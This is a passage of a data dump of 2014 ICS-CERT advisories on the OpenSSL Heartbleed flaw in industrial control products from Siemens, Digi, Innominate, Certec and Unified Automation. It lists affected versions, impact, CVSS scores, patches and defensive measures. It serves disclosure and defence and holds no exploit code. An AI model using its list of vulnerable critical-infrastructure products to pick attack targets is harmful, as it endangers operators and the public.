vulnerability.\n\n## MITIGATION\n\nCertec has made the new OpenSSL (1.0.1g) libraries available to fix the Heartbleed bug in atvise. The DLLs and the installation instructions can be found on their web site at the following location:\n\n<http://www.atvise.com/en/component/phocadownload/category/2-products?download=181:patch-openssl>\n\nFor more information, please see Certec\u2019s security update at the following location:\n\n<http://www.atvise.com/en/news-events/news/260-important-security-update-heartbleed-bug>\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: <http://ics-cert.us-cert.gov/content/recommended-practices>. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Mitigation Strategies](<http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B>), that is available for download from the ICS-CERT web site (<http://ics-cert.us-cert.gov/>).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, <http://cwe.mitre.org/data/definitions/119.html>, web site last accessed April 24, 2014.\n * b. NVD, <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>, web site last accessed April 24, 2014.\n * c. CVSS Calculator, [http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/AU:N/C:P/I:N/A:N](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/AU:N/C:P/I:N/A:N>), web site last accessed April 24, 2014.\n", "edition": 7, "reporter": "Industrial Control Systems Cyber Emergency Response Team", "published": "2014-04-24T00:00:00", "title": "Certec atvise scada OpenSSL Heartbleed Vulnerability", "type": "ics", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "modified": "2018-08-23T00:00:00", "id": "ICSA-14-114-01", "href": "https://ics-cert.us-cert.gov//advisories/ICSA-14-114-01", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-06T20:01:57", "references": ["http://ics-cert.us-cert.gov/content/recommended-practices", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-105-03B", "http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N", "http://www.siemens.com/cert/advisories", "http://www.ruggedcom.com/support/appnotes/", "http://www.us-cert.gov/pdf/", "http://www.us-cert.gov/accessibility/", "http://www.siemens.com/automation/support-request", "https://ics-cert.us-cert.gov/Report-Incident?", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-105-03B", "http://support.automation.siemens.com/WW/view/en/87493352/133100", "http://www.us-cert.gov/tlp/", "http://www.us-cert.gov/tlp/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov", "http://support.automation.siemens.com/WW/view/en/67295862/133100", "http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B", "http://twitter.com/icscert", "http://twitter.com/icscert", "http://support.automation.siemens.com/WW/view/en/92417421", "http://ics-cert.us-cert.gov/", "https://portal.etm.at/index.php?option=com_content&view=category&id=65&layout=blog&Itemid=80", "http://cwe.mitre.org/data/definitions/119.html", "https://www.us-cert.gov/forms/feedback?helpful=no&document=ICSA-14-105-03B Siemens Industrial Products OpenSSL Heartbleed Vulnerability (Update B)&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-105-03B&site_name=ICS-CERT", "http://www.us-cert.gov/privacy/", "https://www.us-cert.gov/forms/feedback?helpful=yes&document=ICSA-14-105-03B Siemens Industrial Products OpenSSL Heartbleed Vulnerability (Update B)&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-105-03B&site_name=ICS-CERT", "https://twitter.com/share?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-105-03B", "http://www.dhs.gov", "http://www.dhs.gov/report-cyber-risks", "https://www.us-cert.gov/forms/feedback?helpful=somewhat&document=ICSA-14-105-03B Siemens Industrial Products OpenSSL Heartbleed Vulnerability (Update B)&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-105-03B&site_name=ICS-CERT"], "description": "## OVERVIEW\n\nThis updated advisory is a follow-up to the updated advisory titled ICSA-14-105-03A Siemens Industrial Products OpenSSL Heartbleed Vulnerability that was published April 29, 2014, on the NCCIC/ICS-CERT web site.\n\nSiemens reported to ICS-CERT a list of products affected by the OpenSSL vulnerability (known as \u201cHeartbleed\u201d). Joel Langill of Infrastructure Defense Security Services reported to ICS-CERT and Siemens the OpenSSL vulnerability affecting the S7-1500.\n\n### **\\--------- Begin Update B Part 1 of 3 --------**\n\nSiemens has produced an update and Security Advisory (SSA-635659) that mitigates this vulnerability in each of the affected products listed below.\n\n### **\\--------- End Update B Part 1 of 3 ----------**\n\nThis vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\n### **\\--------- Begin Update **B** Part 2 of 3 --------**\n\nThe following Siemens products are affected:\n\n * eLAN-8.2 eLAN prior to 8.3.3 (affected when RIP is used\u2014update available),\n * WinCC OA only V3.12 (always affected\u2014update available),\n * S7-1500 V1.5 (affected when HTTPS active\u2014update available),\n * CP1543-1 V1.1 (affected when FTPS active\u2014update available), and\n * APE 2.0 (affected when SSL/TLS component is used in customer implementation\u2014update available).\n\n### **\\--------- End Update B Part 2 of 3 ----------**\n\n## IMPACT\n\nA successful \u201cHeartbleed\u201d exploit of the affected products by an attacker with network access could allow attackers to read sensitive data (to include private keys and user credentials) from the process memory.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSiemens is a multinational company headquartered in Munich, Germany.\n\nThe affected Siemens industrial products are for process and network control and monitoring in critical infrastructure sectors such as Chemical, Critical Manufacturing, Energy, Food and Agriculture, and Water and Wastewater Systems.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### BUFFER ERRORSa\n\nThe Heartbleed vulnerability could allow attackers to read unallocated memory of OpenSSL running processes. This could reveal secrets like transmitted data, passwords, or private keys.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nThe attacker must have network access to the affected devices to exploit this vulnerability. Siemens recommends operating all products except perimeter devices only within trusted networks.\n\n### **\\--------- Begin Update B Part 3 of 3 --------**\n\nSiemens provides updates for the following products:\n\n * eLAN-8.2. To obtain the update to Version 8.3.3, submit a support request online at:\n\n<http://www.siemens.com/automation/support-request>\n\n * WinCC OA V3.12. The update for WinCC OA 3.12 can be obtained here (login required):\n\n[https://portal.etm.at/index.php?option=com_content&view=category&id=65&layout=blog&Itemid=80](<https://portal.etm.at/index.php?option=com_content&view=category&id=65&layout=blog&Itemid=80>)\n\n * CP-1543-1 V1.1. The update for CP-1543 V1.1 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/92417421>\n\n * APE 2.0. The update for APE can be obtained here:\n\n<http://www.ruggedcom.com/support/appnotes/>\n\n * S7-1500 V1.5. The update for S7-1500 V1.5 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/67295862/133100>\n\n * S7-1500 V1.5. The update for S7-1500 Failsafe V1.5 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/87493352/133100>\n\n### **\\--------- End Update B Part 3 of 3 ----------**\n\nSiemens provides specific advice for mitigating risk in each of the affected products in SSA\u2011635659, which can be found at their web site at the following location:\n\n<http://www.siemens.com/cert/advisories>\n\nThe researcher suggests if HTTPS is not needed to disable it until a patch is available and applied to the vulnerable product/service.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: <http://ics-cert.us-cert.gov/content/recommended-practices>. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B>), that is available for download from the ICS-CERT web site (<http://ics-cert.us-cert.gov/>).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, <http://cwe.mitre.org/data/definitions/119.html>, web site last accessed April 15, 2014.\n * b. NVD, <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>, web site last accessed April 15, 2014.\n * c. CVSS Calculator, [http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N>), web site last accessed April 15, 2014.\n", "edition": 6, "reporter": "Industrial Control Systems Cyber Emergency Response Team", "published": "2014-05-20T00:00:00", "title": "Siemens Industrial Products OpenSSL Heartbleed Vulnerability (Update B)", "type": "ics", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "modified": "2018-09-06T00:00:00", "id": "ICSA-14-105-03B", "href": "https://ics-cert.us-cert.gov//advisories/ICSA-14-105-03B", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-06T20:02:06", "references": ["https://twitter.com/share?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-105-02A", "http://ics-cert.us-cert.gov/content/recommended-practices", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-105-02A", "http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N", "https://www.us-cert.gov/forms/feedback?helpful=somewhat&document=ICSA-14-105-02A Innominate mGuard OpenSSL HeartBleed Vulnerability (Update A)&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-105-02A&site_name=ICS-CERT", "https://www.us-cert.gov/forms/feedback?helpful=yes&document=ICSA-14-105-02A Innominate mGuard OpenSSL HeartBleed Vulnerability (Update A)&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-105-02A&site_name=ICS-CERT", "http://www.us-cert.gov/pdf/", "http://www.us-cert.gov/accessibility/", "https://ics-cert.us-cert.gov/Report-Incident?", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-105-02A", "http://www.innominate.com/data/downloads/software/innominate_security_advisory_20140411_001_en.pdf", "http://www.us-cert.gov/tlp/", "http://www.us-cert.gov/tlp/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B", "http://twitter.com/icscert", "http://twitter.com/icscert", "http://ics-cert.us-cert.gov/", "https://www.us-cert.gov/forms/feedback?helpful=no&document=ICSA-14-105-02A Innominate mGuard OpenSSL HeartBleed Vulnerability (Update A)&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-105-02A&site_name=ICS-CERT", "http://cwe.mitre.org/data/definitions/119.html", "http://www.us-cert.gov/privacy/", "https://www.phoenixcontact.com/mguardsecurity", "http://www.dhs.gov", "http://www.dhs.gov/report-cyber-risks"], "description": "## OVERVIEW\n\nResearcher Bob Radvanovsky of Infracritical has notified NCCIC/ICS-CERT that Innominate has released a new firmware version that mitigates the OpenSSL HeartBleed vulnerability in the mGuard products.\n\n### **\\--------- Begin Update A Part 1 of 4 --------**\n\nPhoenix Contact branded devices are not likely to be affected, but Phoenix Contact has released a new firmware version to alleviate concern about this vulnerability affecting its products.\n\n### **\\--------- End Update A Part 1 of 4 ----------**\n\nThis vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\n### **\\--------- Begin Update A Part 2 of 4 --------**\n\nThe following mGuard versions are affected:\n\n * mGuard firmware Versions 8.0.0 and 8.0.1\n\nmGuard firmware versions prior to 8.0.0 whether running on Innominate, Phoenix Contact, or other brands of devices are NOT affected.\n\n### **\\--------- End Update A Part 2 of 4 ----------**\n\n## IMPACT\n\nmGuard firmware Versions 8.0.0 and 8.0.1 use the OpenSSL cryptographic library and transport layer security (TLS) implementation Version 1.0.1, which is known to be vulnerable to the HeartBleed vulnerability.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND \n\n### **\\--------- Begin Update A Part 3 of 4 --------**\n\nInnominate is a German-based company that sells products worldwide through its international partners. Innominate was acquired by Phoenix Contact in 2008.\n\n### **\\--------- End Update A Part 3 of 4 ----------**\n\nThe affected products, the mGuard family of products, are industrial security routers. They can be found in many critical infrastructure sectors, including Communications, Healthcare and Public Health, and Critical Manufacturing.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERa\n\nBecause of the unpredictable memory layout of HTTPS communication, it is possible that the private key of the mGuard web graphic user interface could be disclosed. An attacker could use this key to impersonate the authenticated user and perform a man-in-the-middle attack.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nAll users of the affected mGuard firmware Versions 8.0.0 and 8.0.1 should upgrade to mGuard firmware Version 8.0.2. Innominate recommends users update SSL keys on the affected products after upgrade. The mGuard firmware Version 8.0.2 provides a combined function to replace both the HTTPS and SSH keys.\n\nFor more information regarding this vulnerability and specific instructions on how to install the latest firmware version, please see the Innominate Security Advisory published April 11, 2014, at the following location:\n\n<http://www.innominate.com/data/downloads/software/innominate_security_advisory_20140411_001_en.pdf>\n\n### **\\--------- Begin Update A Part 4 of 4 --------**\n\nPhoenix Contact branded devices are not vulnerable to this issue, as they are using mGuard firmware Version 7.5 that is not affected by HeartBleed. Only mGuard firmware Versions 8.0.0 and 8.0.1 are affected. Phoenix Contact has posted the 8.0.2 firmware patch release on its web site:\n\n<https://www.phoenixcontact.com/mguardsecurity>\n\n### **\\--------- End Update A Part 4 of 4 ----------**\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: <http://ics-cert.us-cert.gov/content/recommended-practices>. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Mitigation Strategies](<http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B>), that is available for download from the ICS-CERT web site (<http://ics-cert.us-cert.gov/>).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, <http://cwe.mitre.org/data/definitions/119.html>, web site last accessed April 15, 2014.\n * b. NVD, <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>, web site last accessed April 15, 2014.\n * c. CVSS Calculator, [http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N>), web site last accessed April 15, 2014.\n", "edition": 6, "reporter": "Industrial Control Systems Cyber Emergency Response Team", "published": "2014-04-17T00:00:00", "title": "Innominate mGuard OpenSSL HeartBleed Vulnerability (Update A)", "type": "ics", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "modified": "2018-09-06T00:00:00", "id": "ICSA-14-105-02A", "href": "https://ics-cert.us-cert.gov//advisories/ICSA-14-105-02A", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-06T20:01:55", "references": ["http://ics-cert.us-cert.gov/content/recommended-practices", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-128-01", "http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N", "http://www.digi.com/support/kbase/kbaseresultdetl?id=3566", "http://www.us-cert.gov/pdf/", "http://www.us-cert.gov/accessibility/", "https://ics-cert.us-cert.gov/Report-Incident?", "http://www.digi.com/support", "http://www.digi.com/support", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-128-01", "http://www.us-cert.gov/tlp/", "http://www.us-cert.gov/tlp/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov", "https://twitter.com/share?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-128-01", "http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B", "https://www.us-cert.gov/forms/feedback?helpful=somewhat&document=ICSA-14-128-01 Digi International OpenSSL Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-128-01&site_name=ICS-CERT", "http://twitter.com/icscert", "http://twitter.com/icscert", "http://ics-cert.us-cert.gov/", "http://cwe.mitre.org/data/definitions/119.html", "https://www.us-cert.gov/forms/feedback?helpful=no&document=ICSA-14-128-01 Digi International OpenSSL Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-128-01&site_name=ICS-CERT", "http://www.us-cert.gov/privacy/", "http://www.dhs.gov", "http://www.dhs.gov/report-cyber-risks", "http://www.digi.com/support/kbase/kbaseresultdetl?id=3564", "https://www.us-cert.gov/forms/feedback?helpful=yes&document=ICSA-14-128-01 Digi International OpenSSL Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-128-01&site_name=ICS-CERT"], "description": "## OVERVIEW\n\nDigi International has identified five products that are vulnerable to the OpenSSL Heartbleed bug. Digi International has produced downloadable firmware upgrade versions that mitigate this vulnerability.\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe following Digi International products are affected:\n\n * ConnectPort LTS,\n * ConnectPort X2e,\n * Digi Embedded Linux 5.9,\n * Digi Embedded Yocto 1.4, and\n * Wireless Vehicle Bus Adapter (WVA).\n\n## IMPACT\n\nA missing bounds check in the handling of the TLS Heartbeat extension can be used to reveal up to 64kB of memory on a connected device. An attacker who successfully exploits this vulnerability may obtain the user credentials and cryptographic keys used to access the device.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nDigi International is a US-based company located in Minnetonka, Minnesota. It maintains offices in Europe, Middle East, Africa, Asia, and Latin America.\n\nDigi International is a provider of machine-to-machine (M2M) cloud products and services, using both wired and wireless technologies. Digi International acquired Etherios in 2013. Digi International uses vulnerable versions of OpenSSL.\n\nThe affected Digi International products are wireless web/mesh-based SCADA communication systems. According to Digi International, their products are deployed across several sectors including Commercial Facilities, Communications, Critical Manufacturing, Energy, Transportation Systems, and others.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERa\n\nThe Heartbleed bug could allow attackers to read unallocated memory of OpenSSL running processes. This could reveal data like transmitted data, passwords, or private keys.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a moderate skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nDigi International published a Security Notice OpenSSL \u201cHeartbleed\u201d on April 14, 2014, updated on April 18, 2014, at the following URL:\n\n<http://www.digi.com/support/kbase/kbaseresultdetl?id=3564>\n\nRecommended firmware updates for most vulnerable Digi International devices are located on the Digi International technical support site, at URL:\n\n[www.digi.com/support](<http://www.digi.com/support>)\n\nThe Digi OpenSSL Heartbleed fix for Digi Embedded Yocto 1.4 is available in the github repositories, and instructions for this update are at URL:\n\n<http://www.digi.com/support/kbase/kbaseresultdetl?id=3566>\n\nAll products vulnerable to the OpenSSL Heartbleed bug can also be accessed via Device Cloud by Etherios. Device Cloud is a management platform providing the capability to perform device management functions to installed base of devices regardless of location.\n\nDigi International also recommends subscribing to the RSS feed on the support site for Digi International products to get immediate notice of any new firmware or document releases specific to Digi International product updates.\n\nDigi International recommends the following defensive measures:\n\n * Update Firmware. The recommended fix for Heartbleed for Digi International devices is to update to a fixed firmware version update, available on the [www.digi.com/support](<http://www.digi.com/support>) web site.\n * Change Certificates. If HTTPS service is enabled, and the user has deployed a private key and certificate to the web interface (highly recommended), change the certificate at this time and update to an unaffected firmware version prior to changing the private key certificates.\n * Change Passwords. If HTTPS service is enabled, change all passwords associated with the affected device, including device user passwords. If using TACACS or RADIUS, change the user passwords as well as the shared secret. If VPN is used in this configuration, change the passwords and/or tokens.\n * Disable the Web Service. Disabling the HTTPS service and still maintaining manageability on the device can be accomplished in a number of ways. Manage the device through a command line service like SSH, or use a Device Cloud account to centrally manage all the devices. Further, if HTTPS service is enabled and on a public IP on the Internet, restrict or disable the HTTPS web interface to specific IPs.\n * Check Services. If any HTTPS services have been implemented within Python, please evaluate the code and make sure that it is not impacted. If shell scripting uses the OpenSSL commands, please ensure to mitigate the Heartbeat TLS extension.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: <http://ics-cert.us-cert.gov/content/recommended-practices>. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Mitigation Strategies](<http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B>), that is available for download from the ICS-CERT web site (<http://ics-cert.us-cert.gov/>).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, <http://cwe.mitre.org/data/definitions/119.html>, web site last accessed May 08, 2014.\n * b. NVD, <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>, web site last accessed May 08, 2014.\n * c. CVSS Calculator, [http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N>) , web site last accessed May 08, 2014.\n", "edition": 6, "reporter": "Industrial Control Systems Cyber Emergency Response Team", "published": "2014-05-08T00:00:00", "title": "Digi International OpenSSL Vulnerability", "type": "ics", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "modified": "2018-09-06T00:00:00", "id": "ICSA-14-128-01", "href": "https://ics-cert.us-cert.gov//advisories/ICSA-14-128-01", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-06T20:02:14", "references": ["http://ics-cert.us-cert.gov/content/recommended-practices", "http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N", "http://www.unified-automation.com/news/news-details/article/1139-heartbleed-bug-in-openssl.html", "https://www.us-cert.gov/forms/feedback?helpful=no&document=ICSA-14-135-04 Unified Automation OPC SDK OpenSSL Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-135-04&site_name=ICS-CERT", "http://www.us-cert.gov/pdf/", "http://www.us-cert.gov/accessibility/", "https://ics-cert.us-cert.gov/Report-Incident?", "https://twitter.com/share?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-135-04", "http://www.us-cert.gov/tlp/", "http://www.us-cert.gov/tlp/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B", "http://twitter.com/icscert", "http://twitter.com/icscert", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-135-04", "http://ics-cert.us-cert.gov/", "http://cwe.mitre.org/data/definitions/119.html", "https://www.us-cert.gov/forms/feedback?helpful=yes&document=ICSA-14-135-04 Unified Automation OPC SDK OpenSSL Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-135-04&site_name=ICS-CERT", "http://www.us-cert.gov/privacy/", "http://www.openssl.org/", "http://www.dhs.gov", "http://www.dhs.gov/report-cyber-risks", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-135-04", "https://www.us-cert.gov/forms/feedback?helpful=somewhat&document=ICSA-14-135-04 Unified Automation OPC SDK OpenSSL Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-135-04&site_name=ICS-CERT"], "description": "## OVERVIEW\n\nOn April 09, 2014, Unified Automation GmbH announced that its OPC UA Software Development Kits (SDKs) for Windows included vulnerable OpenSSL libraries. HTTPS support is disabled by default in Unified Automation SDK products. However if HTTPS is used, Unified Automation recommends replacing the OpenSSL library with a current version (1.01.g or later) to mitigate this vulnerability.\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe following Unified Automation GmbH OPC UA SDK for Windows versions are affected:\n\n * C++ based OPC UA SDK V1.4.0 (Windows), and\n * ANSI C based OPC UA SDK V1.4.0 (Windows).\n\n## IMPACT\n\nIf HTTPS is enabled, then use 